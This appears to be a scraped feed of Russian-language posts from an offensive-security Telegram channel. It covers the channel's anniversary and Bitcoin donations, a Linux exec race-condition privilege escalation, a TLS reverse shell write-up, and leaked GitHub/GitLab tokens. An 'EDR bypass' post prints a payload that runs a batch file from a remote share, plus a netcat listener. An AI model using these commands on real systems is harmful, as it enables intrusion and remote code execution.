This media is not supported in your browser
VIEW IN TELEGRAM
С днем рождения !!!!
Сегодня Proxy Bar исполняется 3 года
***
Много воды утекло, но вектор канала сохранился, изменения коснулись чата группы, а именно:
# был перестроен чат
# набралась команда админов (хорошие специалисты и прекрасные люди)
# В рамках чата начали формироваться конкурсы и авторские статьи (+ source code)
*
Ну и по поводу дня рождения хотим поделиться в Вами некоторыми нашими сервисами:
заходите на proxy-bar.org там есть краткое описание, из основного
это секция Soft, Send, Secnote, PrivateBin, Jabber (много кто просил) и библиотека
*
С праздником, и Вас и Нас ! 😜
*
Если Вам нравится то что мы делаем, Вы можете нас поддержать:
***
Donate:
Bitcoin bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
#lденьрождения #админы #всевсевсе
Сегодня Proxy Bar исполняется 3 года
***
Много воды утекло, но вектор канала сохранился, изменения коснулись чата группы, а именно:
# был перестроен чат
# набралась команда админов (хорошие специалисты и прекрасные люди)
# В рамках чата начали формироваться конкурсы и авторские статьи (+ source code)
*
Ну и по поводу дня рождения хотим поделиться в Вами некоторыми нашими сервисами:
заходите на proxy-bar.org там есть краткое описание, из основного
это секция Soft, Send, Secnote, PrivateBin, Jabber (много кто просил) и библиотека
*
С праздником, и Вас и Нас ! 😜
*
Если Вам нравится то что мы делаем, Вы можете нас поддержать:
***
Donate:
Bitcoin bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
#lденьрождения #админы #всевсевсе
🔥130👍23😱9
This media is not supported in your browser
VIEW IN TELEGRAM
XSS в 2024
и смешно и грустно
и смешно и грустно
🔥147👍21😱18
bypass EDR
*
payload
+ еще decimal можно
*
payload
https://&cmd/c\\\\192.168.2.15\\Public\\aa.bat
nc -lvnp 4444
+ еще decimal можно
👍26😱9🔥6
Linux Malware Development:
Создание reverse shell на основе TLS/SSL на Python
*
writeUP
*
source: reverse_ssl.py
Создание reverse shell на основе TLS/SSL на Python
*
writeUP
*
source: reverse_ssl.py
🔥24👍2
Kernel (Linux) _#
*
В ядре Linux в системных вызовах
Есть два состояния бинаря (условно), которые должны быть безопасными:
1. Бинарь имеет root-идентификатор +
2. Бинарь не имеет руть идентификатора, потому может быть выполнен хакером.
*
А вот тут то и впрягается состояния гонки, как и в реальном мире, старичок бит может не успетьвыпить таблетки
*
Proof of Concept
#LPE #linux #ricecondition #kernel
*
В ядре Linux в системных вызовах
exec существует проблема времени проверки/времени использования. Разрешения на выполнение проверяются в другое время, чем применяется бит set-user-ID. Это LPE.Есть два состояния бинаря (условно), которые должны быть безопасными:
1. Бинарь имеет root-идентификатор +
set-user-ID, но хакеру его не исполнить.2. Бинарь не имеет руть идентификатора, потому может быть выполнен хакером.
*
А вот тут то и впрягается состояния гонки, как и в реальном мире, старичок бит может не успеть
*
Proof of Concept
#LPE #linux #ricecondition #kernel
🔥18😱4👍3
Рубрика
*
Чуваки за 30 дней вытащили 1439 действительных токенов гитЛАБа и гитХАБа.
Токены обеспечивают доступ к:
108 707 репозиториям кода.
2117 организациям/группам.
*
Список юзеров у которых увели токен с GitHub
Список юзеров у которых увели токен с GitLab
*
Ищем себя ))
Ну стоит добавить что это whitehat команда, и если себя нашли просят связаться с
.git leaks*
Чуваки за 30 дней вытащили 1439 действительных токенов гитЛАБа и гитХАБа.
Токены обеспечивают доступ к:
108 707 репозиториям кода.
2117 организациям/группам.
*
Список юзеров у которых увели токен с GitHub
Список юзеров у которых увели токен с GitLab
*
Ищем себя ))
Ну стоит добавить что это whitehat команда, и если себя нашли просят связаться с
Gi7w0rm , добряки )))👍29😱6🔥5